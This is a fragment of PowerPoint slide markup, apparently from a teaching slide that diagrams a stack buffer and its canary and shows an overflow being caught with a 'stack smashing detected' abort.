                <a:cubicBezTo>
                  <a:pt x="-48882" y="1071955"/>
                  <a:pt x="20055" y="950395"/>
                  <a:pt x="0" y="798560"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-20055" y="646725"/>
                  <a:pt x="13033" y="517708"/>
                  <a:pt x="0" y="330901"/>
                </a:cubicBezTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:schemeClr val="tx1">
              <a:lumMod val="85000"/>
              <a:lumOff val="15000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="38100">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0x7ffe41c142c0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>abcdefghi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>abcdefghi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stack smashing detected ***: &lt;unknown&gt; terminated</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Abort (core dumped)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C2296C4-EC89-4244-AC42-7460892D1D85}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="369052" y="2206370"/>
            <a:ext cx="4830980" cy="3175952"/>
            <a:chOff x="197157" y="2192004"/>
            <a:chExt cx="4830980" cy="3175952"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="16" name="Group 15">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D15E2F8-5B37-B447-86CF-58ED36CB707B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="197157" y="4573950"/>
              <a:ext cx="4830980" cy="794006"/>
              <a:chOff x="9208848" y="3986002"/>
              <a:chExt cx="1940175" cy="245224"/>
            </a:xfrm>
            <a:solidFill>
              <a:srgbClr val="002060"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="53" name="Rectangle 52">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{24537A30-9477-C243-8C1A-D4011FE707E1}"/>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4" name="Rectangle 53">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9099185E-CAB1-1643-AEA8-522CB59231DB}"/>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5" name="Rectangle 54">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3A211EA-2A38-2941-B775-1F5DDFBD005F}"/>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6" name="Rectangle 55">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B77A6F5-2DFB-1F43-B1D3-A6117C464387}"/>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7" name="Rectangle 56">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C974135-B4B0-2648-AC1E-96E33BCF8D91}"/>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8" name="Rectangle 57">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B7EAFABF-ECD4-BC4A-AE0C-2164090BFCE9}"/>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9" name="Rectangle 58">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C1870BD4-74B3-F240-BE43-3584112FA601}"/>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60" name="Rectangle 59">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A88D887C-5876-C749-A470-2E572D5A8E87}"/>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17" name="Group 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2F90964-AC44-9C46-B62D-245D5F4D5002}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="197157" y="2985997"/>
              <a:ext cx="4830980" cy="794006"/>
              <a:chOff x="9208848" y="3986002"/>
              <a:chExt cx="1940175" cy="245224"/>
            </a:xfrm>
            <a:solidFill>
              <a:srgbClr val="002060"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="45" name="Rectangle 44">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{79A6298F-CD8F-4D47-ADD1-0C5BAD77BED6}"/>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6" name="Rectangle 45">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{008352E3-1B60-934F-8107-9180467864E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7" name="Rectangle 46">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{35B0F740-6C0B-6D4F-9CA8-A239123FF49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8" name="Rectangle 47">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA9C6DA6-8465-DA4F-8242-3899212379EC}"/>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9" name="Rectangle 48">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D5196489-4C74-7E42-B943-D19CAE651245}"/>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50" name="Rectangle 49">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2732757-9107-3F4A-B9BC-F362A79205C1}"/>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51" name="Rectangle 50">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5257418B-4879-BB4D-8D9C-D5EB60CD9FD1}"/>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52" name="Rectangle 51">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27F2A8F2-BB40-8144-B137-CF7719839A2B}"/>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8" name="Group 17">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{47354375-1A92-C14D-BF78-250EF5064113}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="197157" y="3779967"/>
              <a:ext cx="4830980" cy="794006"/>
              <a:chOff x="9208848" y="3986002"/>
              <a:chExt cx="1940175" cy="245224"/>
            </a:xfrm>
            <a:solidFill>
              <a:srgbClr val="FFFF00"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="37" name="Rectangle 36">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB4EDE1B-1FF9-C34E-A0E5-A252F9AD3F81}"/>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38" name="Rectangle 37">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E692232-AC21-984C-9F85-F2672BB467A2}"/>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39" name="Rectangle 38">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{31466174-41ED-8543-A371-DEBE21E8A9AE}"/>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0" name="Rectangle 39">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE4589B5-9CC8-F641-985A-E7A849EC62CB}"/>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1" name="Rectangle 40">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A2B15CB4-F3DF-E441-BD37-A98CBDA0B598}"/>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2" name="Rectangle 41">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E7B3B26F-DBF4-3241-8165-E762162780F1}"/>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3" name="Rectangle 42">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9415C707-DBD5-B74D-9439-41800A31C2B5}"/>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4" name="Rectangle 43">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A92DD0D-1E6C-3845-8F02-CDF44F072DE7}"/>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grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="19" name="Group 18">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B8B61CB-13CC-9141-89B2-FAC19CF1282C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="197157" y="2192004"/>
              <a:ext cx="4830980" cy="794006"/>
              <a:chOff x="9208848" y="3986002"/>
              <a:chExt cx="1940175" cy="245224"/>
            </a:xfrm>
            <a:solidFill>
              <a:srgbClr val="002060"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="29" name="Rectangle 28">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F63CD0FC-A5AB-F148-BA5C-CE273AF76B70}"/>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0" name="Rectangle 29">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3EA9403-0054-4749-B1D5-545F9D71493E}"/>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1" name="Rectangle 30">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D0A700C0-07C3-7748-9E3C-72470430C689}"/>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2" name="Rectangle 31">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D9F58E9C-86A9-E945-920F-C0BD3F311C89}"/>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3" name="Rectangle 32">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BD0FCDCE-0FD0-CE4E-981E-2418F97F8A7B}"/>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4" name="Rectangle 33">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81C45BB1-90F2-2844-8A70-3DBA2B4BA0AB}"/>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5" name="Rectangle 34">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75C1A99C-124E-5E4B-8C9F-09D55C1729D9}"/>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6" name="Rectangle 35">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{62592952-C711-D941-A680-0689637F787A}"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2990601-A062-E444-BCFE-5806C8C1AC57}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2113319" y="4673598"/>
            <a:ext cx="1324465" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="FFFF00"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>buffer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61" name="TextBox 60">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EDEDB05A-E302-FA42-8ABB-C39FE08E175C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2059653" y="3870339"/>
            <a:ext cx="1431802" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="002060"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>canary</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="62" name="Group 61">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D30F83E-1B1B-634D-B7FC-3AA43193E190}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="370156" y="2206370"/>
            <a:ext cx="4830980" cy="3175952"/>
            <a:chOff x="197157" y="2192004"/>
            <a:chExt cx="4830980" cy="3175952"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="63" name="Group 62">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D55374FF-E04B-354D-BD03-D48320E67CC4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="197157" y="4573950"/>
              <a:ext cx="4830980" cy="794006"/>
              <a:chOff x="9208848" y="3986002"/>
              <a:chExt cx="1940175" cy="245224"/>
            </a:xfrm>
            <a:solidFill>
              <a:srgbClr val="002060"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="91" name="Rectangle 90">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{06E24CFF-96C0-074A-A7A8-AE8D5CA9D1CC}"/>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2" name="Rectangle 91">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B5CE00CF-57CC-3943-A29E-0C2868EBB8B2}"/>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3" name="Rectangle 92">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA4B914E-B693-CD45-B33E-3BCB651BB02D}"/>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4" name="Rectangle 93">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2DE77BE-DD9E-AE46-99E6-91203CDB4099}"/>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5" name="Rectangle 94">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F3C447BA-F6DE-3E46-A976-14427468291E}"/>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6" name="Rectangle 95">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4FD17997-91E1-3648-BF29-3773A0C0EDB2}"/>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7" name="Rectangle 96">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56E20603-0120-A54C-86B8-C29EA4DF2570}"/>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8" name="Rectangle 97">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6607C494-76F9-A142-A692-C1C23519720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64" name="Group 63">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74B6D404-1FFC-8244-9064-13F941EE5CD1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="197157" y="2985997"/>
              <a:ext cx="4830980" cy="794006"/>
              <a:chOff x="9208848" y="3986002"/>
              <a:chExt cx="1940175" cy="245224"/>
            </a:xfrm>
            <a:solidFill>
              <a:srgbClr val="002060"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="83" name="Rectangle 82">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{24C5B863-1A82-8D4E-A5F1-BFB7C01190E8}"/>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4" name="Rectangle 83">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7BCB4129-015B-8343-8725-142CFCA4DB28}"/>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5" name="Rectangle 84">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80F6B0CC-2466-E24E-BDC0-3FC2F113532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6" name="Rectangle 85">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81AA2502-8605-6749-AD2F-6EF467162BC4}"/>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7" name="Rectangle 86">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{172DD3E4-019D-2345-B1C6-EAC7FA9874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8" name="Rectangle 87">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D520D5C-5D88-BC42-BCB7-5AE7576BBB70}"/>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9" name="Rectangle 88">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D9576A2-07D9-734F-9A54-1F881DA4FB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0" name="Rectangle 89">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{15BBC653-7489-F44B-9C89-EDE21B61EEFB}"/>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65" name="Group 64">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2F81D88-7D5F-9F4B-A9DC-6EAD5523C01F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="197157" y="3779967"/>
              <a:ext cx="4830980" cy="794006"/>
              <a:chOff x="9208848" y="3986002"/>
              <a:chExt cx="1940175" cy="245224"/>
            </a:xfrm>
            <a:solidFill>
              <a:srgbClr val="FFFF00"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="75" name="Rectangle 74">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DCABD5A7-640C-E04E-BAF3-5CB429E8FA46}"/>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74</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="76" name="Rectangle 75">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E94D48C-C7A4-1346-B7D7-AEC8366C6E6C}"/>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42</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="77" name="Rectangle 76">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{993F9703-A5A2-8C4B-ACF1-22642C0A5088}"/>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F3</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="78" name="Rectangle 77">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{35530F34-053B-8848-B960-EF75D5CA6B4B}"/>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0F</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="79" name="Rectangle 78">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4999E5C3-52E8-A448-896F-0D72541E54FF}"/>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94</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="80" name="Rectangle 79">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{484B8F47-207B-B442-A286-DD22EB4B4601}"/>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97</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="81" name="Rectangle 80">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74C59CD5-0B2D-0843-B66C-60741638F11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A0</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="82" name="Rectangle 81">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A62F204-38CB-E84F-8113-3FEF21295852}"/>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00</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="66" name="Group 65">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F322A2FB-3A9B-9741-85A3-408FA3B76936}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="197157" y="2192004"/>
              <a:ext cx="4830980" cy="794006"/>
              <a:chOff x="9208848" y="3986002"/>
              <a:chExt cx="1940175" cy="245224"/>
            </a:xfrm>
            <a:solidFill>
              <a:srgbClr val="002060"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="67" name="Rectangle 66">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B0B40489-0798-4E4E-8ADE-66CDD2014D29}"/>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68" name="Rectangle 67">
                <a:extLst>
